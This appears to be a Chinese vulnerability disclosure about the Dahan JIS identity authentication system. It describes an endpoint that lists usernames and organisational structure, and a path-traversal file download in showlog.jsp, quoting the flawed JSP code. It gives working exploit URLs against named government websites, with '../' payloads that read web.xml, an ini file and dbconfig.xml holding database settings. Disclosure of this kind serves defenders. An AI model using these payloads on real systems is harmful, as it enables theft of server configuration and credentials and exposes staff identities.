大汉版通JIS统一身份认证系统某处任意文件下载漏洞及一个小越权漏洞

### 简要描述： 上班了上班了。 ### 详细说明： 某处存在一个问题，可以遍历所有的用户名，同时包含组织结构！领导名字都泄漏了啊 http://www.gansu.gov.cn/jis/objectbox/selx.jsp?tabid=1&limit=1&f_id=userid&f_name=vc_username&date= [<img src="https://images.seebug.org/upload/201402/201003077c36051bff6b7314b6d81ee6b7da45c8.png" alt="image105.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/201003077c36051bff6b7314b6d81ee6b7da45c8.png) http://ln-n-tax.gov.cn/jis/objectbox/selx.jsp?tabid=1&limit=1&f_id=userid&f_name=vc_username&date= [<img src="https://images.seebug.org/upload/201402/201003261908a1de5b3d11e875460e67bfaba731.png" alt="image107.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/201003261908a1de5b3d11e875460e67bfaba731.png) ### 漏洞证明： 另外一处还存在一个任意文件下载的问题！ 需要注册的先去/jis/front/userregister.jsp 注册一个用户。有部分是无需登录的 jis/manage/databak/showlog.jsp path参数 ``` String strTitle = "机构信息→恢复"; String path = Convert.getParameter(request,"path"); String strFilePath = application.getRealPath(""); strFilePath = strFilePath+"/manage/databak/databakbag/"+path; TxtHandle txtHandle = new TxtHandle(); txtHandle.setEncoding("GBK"); String content = txtHandle.getStringFromFile(strFilePath); if(content.length()>7){ content = content.substring(0,8)+" "+content.substring(8,content.length()); content = content.replaceAll("!","! "); } ``` http://management.ysx.gov.cn/jis/manage/databak/showlog.jsp?path=../showlog.jsp http://www.gansu.gov.cn/jis/manage/databak/showlog.jsp?path=../showlog.jsp [<img src="https://images.seebug.org/upload/201402/201011237c3e7fb84f774a7bf0b2098e87d857bb.png" alt="image091.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/201011237c3e7fb84f774a7bf0b2098e87d857bb.png) http://www.gansu.gov.cn/jis/manage/databak/showlog.jsp?path=../../../WEB-INF/web.xml [<img src="https://images.seebug.org/upload/201402/20101158385f56dc7f027f239ecabacf3c1e29ed.png" alt="image092.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/20101158385f56dc7f027f239ecabacf3c1e29ed.png) http://www.gansu.gov.cn/jis/manage/databak/showlog.jsp?path=../../../WEB-INF/ini/merpserver.ini [<img src="https://images.seebug.org/upload/201402/20101222ffad9a27f6990cfde1d0f2f94de5c1b4.png" alt="image094.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/20101222ffad9a27f6990cfde1d0f2f94de5c1b4.png) http://www.gansu.gov.cn/jis/manage/databak/showlog.jsp?path=../../../WEB-INF/config/dbconfig.xml [<img src="https://images.seebug.org/upload/201402/20101240e6fd5b3ff4d50ba7581ef7a4cfdee233.png" alt="image095.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/20101240e6fd5b3ff4d50ba7581ef7a4cfdee233.png) http://jd.ningbo.gov.cn/jis/manage/databak/showlog.jsp?path=../showlog.jsp [<img src="https://images.seebug.org/upload/201402/20101319873981669951dc7441e5b91328282f58.jpg" alt="20140220101301.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/20101319873981669951dc7441e5b91328282f58.jpg)